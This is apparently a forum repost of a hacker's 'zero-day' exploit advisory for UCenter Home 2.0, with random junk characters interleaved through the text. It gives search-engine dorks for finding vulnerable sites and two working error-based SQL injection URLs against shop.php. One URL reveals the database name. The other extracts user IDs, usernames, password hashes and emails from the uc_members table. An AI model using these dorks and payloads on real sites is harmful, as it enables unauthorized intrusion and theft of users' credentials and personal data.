2 L- S2 Z, g) Y+ w$ r
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 1 v5 U. m1 E( f
i9 T p0 U p# A) `
1 R) j" O1 W) b
7 {7 r3 V8 M& P; k1 Y0 W/ }& P*/ Author : KnocKout
! Y, x1 ~5 w9 z( X5 f* r, } n5 S5 F# Y% f0 T
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 4 [+ W& B0 z1 T, m& h& k5 [' S
3 E7 ~8 }; [' A- W, N*/ Contact: knockoutr@msn.com 1 C; Q) s9 `/ k/ }- S, A {
; N6 K v' K1 i6 \
*/ Cyber-Warrior.org/CWKnocKout
: |2 L7 e' }# D0 g x* [& ~' b% ]
" o' c s* m* E0 ^" p__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 B: E" d8 U: ?+ f9 I0 B; Q
& Q5 @# L# k/ g: \% k
Script : UCenter Home ; ` B2 f/ ~+ \& r; g
1 v! _( j) m$ X- c
Version : 2.0
. M* I) e7 ?9 w# b" k. y4 M4 r) I
Script HomePage : http://u.discuz.net/
. H% m2 b9 L$ u) B: w/ K
- x1 Y( Z5 B. m4 e8 s; ~$ L, a__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 p6 u6 g5 X2 d# x) X+ ?
, ]; ?" r+ ?' s$ b+ gDork : Powered by UCenter inurl:shop.php?ac=view
$ r9 O' Y5 k1 Z, s0 g1 w% E+ s
: j. [3 q, R8 T% H8 Z) bDork 2 : inurl:shop.php?ac=view&shopid=
' A! |0 b1 A4 s% S% ^/ T8 ?( g1 c/ | E0 z6 O4 p$ ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 ^0 A+ k, A4 j: \- g' }' b( y1 n) j1 o% a F
Vuln file : Shop.php
' m0 r$ Z+ z9 Y2 `" ~, O% O2 V0 S% Z* }- r4 h7 ^% K r
value's : (?)ac=view&shopid= & b4 M o4 p7 p) `! _9 @3 w
5 x) v; }2 F2 `/ d, {! x8 mVulnerable Style : SQL Injection (MySQL Error Based)
/ Y. s. D# J7 G1 i
8 C* m; p% g6 O* |9 h# J8 vNeed Metarials : Hex Conversion
& @) G2 k/ X* V/ B7 Q5 ~% q( J* _6 z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! ^) F7 S# e0 M) V" m t; w
( ~4 U% Z, l9 WYour Need victim Database name.
+ D/ [7 W: }$ P/ b. z% m* D) d7 W* M. M, g# o2 K4 V i9 u
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
# x3 z& r8 d8 a. K& w
9 Z! |- u% U$ F6 G5 |..
* w1 v; ?! L+ [. i/ m
% i& I+ Q7 c3 g# n: MDB : Okey. # Q9 H( [" L X! T
7 |* H. F' e% ]
your edit DB `[TARGET DB NAME]`
: w7 O) N0 n3 [% M" H" @$ e
. K: T1 F/ H$ IExample : 'hiwir1_ucenter'
, N) [7 Q C3 u7 t( g7 n+ t' s% v: Z) U2 ?3 ?' U' u% Y* l4 G
Edit : Okey. ) L. w" s7 ^" E3 X6 T9 J
( ]3 g2 A1 b4 l
Your use Hex conversion. And edit Your SQL Injection Exploit.. / r/ e# T$ o) b& ]- Z
8 x% N0 D: Z3 t+ G
R4 N; t# `' |: e/ E6 k1 Y) I
$ l& E7 V3 V4 Z h6 s6 uExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
7 B) ~9 M! P4 f, g' A0 C( ~ |
发表于 2013-2-27 21:31:31
收藏
支持
反对